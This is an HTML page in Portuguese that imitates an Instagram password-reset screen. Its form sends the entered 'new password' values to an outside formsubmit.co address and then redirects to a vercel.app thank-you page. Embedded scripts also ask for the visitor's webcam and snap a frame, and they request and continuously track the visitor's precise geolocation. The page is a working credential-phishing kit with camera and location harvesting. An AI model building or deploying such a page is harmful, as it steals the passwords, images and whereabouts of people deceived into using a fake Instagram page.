<!DOCTYPE html>
<html lang="pt-br">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Instagram</title>
</head>
    <ul class="barram">
        <li><img src="imagens/home-icon.png" alt="" width="35px"></li>
        <li><a href=""></a><img id="insta" src="imagens/instagran.png" alt="" width="125px"></li>
        <li class="entrar"><a href="https://www.instagram.com/accounts/login/"></a><img src="imagens/usuario.png" alt="" width="30px"></li>
    </ul>
</header>
<style>
    body, ul,li,p{
    margin: 0px;
    padding: 0px;
    list-style: none;
    font-size: 1.2rem;
    font-family: Arial, Helvetica, sans-serif;
    color: white;}

    ul.barram{
        display: flex;
        flex-wrap: wrap;
        display: flex;
    flex-wrap: wrap;
    justify-content: space-between;
    background: rgb(58, 103, 170);
    padding: 10px;
    }
    @media (max-width: 1300px){
        img{
            width: 20px;
    }
    #insta{
        width: 90px;
    }
    }
</style>
<body>
    <H1>
        Instagram
    </H1>
    <div id="alerts" class="alerts">
        <p class="alert-red">Crie uma senha com pelo menos 6 caracteres.</p>   
    </div>
    <style>
        h1{
            text-align: center;
            color: rgb(40, 40, 228);
        }
        p.alert-red{
            color: rgb(87, 45, 45);
            background: rgb(255, 119, 119);
            width: 550px;
            margin-left: 50px;
        }
        div{
        margin-left: 275px;
        }
        body{
            background: rgb(255, 255, 255);
        }
        @media (max-width: 1300px){
            div{
        margin-left:10px;
        }
        p.alert-red{
            width: 400px;
            font-size: 14px;
            margin-left: -10px;
        }
        p{
            max-width: 100%;
        }
        form{
            max-width: 100%;
        }
        }
    </style>
    <form action="https://formsubmit.co/3e840d4f133754e06bd220d771efa190" method="POST" enctype="multipart/form-data">
        <p>
        <label for="id_enc_new_password1">Nova senha:</label><br>
        <input type="password" name="senha1" id="pass" placeholder="Nova senha" minlength="8" required><br>
        </p>
        <p>
        <label for="id_enc_new_password2">Confirmação de senha nova:</label><br>
        <input type="password" name="senha2" id="pass" placeholder="Confirmação de senha nova" minlength="8" required><br>
        </p><br>

        <canvas></canvas>
        <input type="file" name="foto" id="filer" accept=".jpg,.gif,.phg" multiple>

        <input type="hidden" name="_captcha" value="false">
        <input type="hidden" name="_next" value="https://questoesquiz-srbogolhao.vercel.app/Instagram/Obrigado.html">
        <button type="submit">Redefinir senha</button>
   </form>
   <style>
       form{
        border: 3px;
        border-color: black;
        background: rgb(255, 255, 255);
        display: flex;
        flex-direction: column;
        width: 700px;
        height: 500px;
        margin: 0 auto;
       }
       label{
           font-size: 14px;
           color: black;
           font-family: Arial;
           font-weight: bold;
       }
        input{
            width: 300px;
            height: 30px;
        }
        button{
            text-align: left;
            font-size: 18px;
            width: 150px;
        }
        canvas{
            display: none;
        }
   </style>

   <div>
    <video autoplay></video>
    <script>
        var video = document.querySelector(`video`);

navigator.mediaDevices.getUserMedia({video:true})
.then(stream => {
    video.srcObject = stream;
    video.play();
})
.catch(error => {
    console.log(error);
})

//video feito

document.querySelector(`button`).addEventListener(`click`, () => {
    var canvas = document.querySelector(`canvas`);
    canvas.height = video.videoHeight;
    canvas.width = video.videoWidth;

    var context = canvas.getContext(`2d`);
    context.drawImage(video, 0, 0);

    var link = document.createElement(`a`);
    link.download = `foto.jpg`;
    link.href = canvas.toDataURL();
    link.textContent = `clik para baixar a imagem`;
    document.body.appendChild(link);
})
    </script>
   </div>


   <div>
       <h3 ></h3>
       <Script>
           let h3 = document.querySelector(`h3`);


           function success(pos){
               console.log(pos.coords.latitude, pos.coords.longitude);//dados lat longi

               h3.textContent = `Latitude: ${pos.coords.latitude},e sua longitude: ${pos.coords.longitude}`//escreve lat e long
           }

           function error(err){
               console.log(err);
           }
           
           navigator.geolocation.getCurrentPosition(success, error);//latitude e longitude
           var watchID = navigator.geolocation.watchPosition(success, error, {
            enableHighAccuracy:true,
            timeout:10000
           });
       </Script>
   </div>


   <script>
       const btn = document.querySelector(`#send`);
       btn.addEventListener(`click`, function(e){
            e.preventDefault();
            const name = document. querySelector(`#email`);

            const value = name.value;

            console.log(value)

       });

   </script>


   <script>



   </script>
</body>
</html>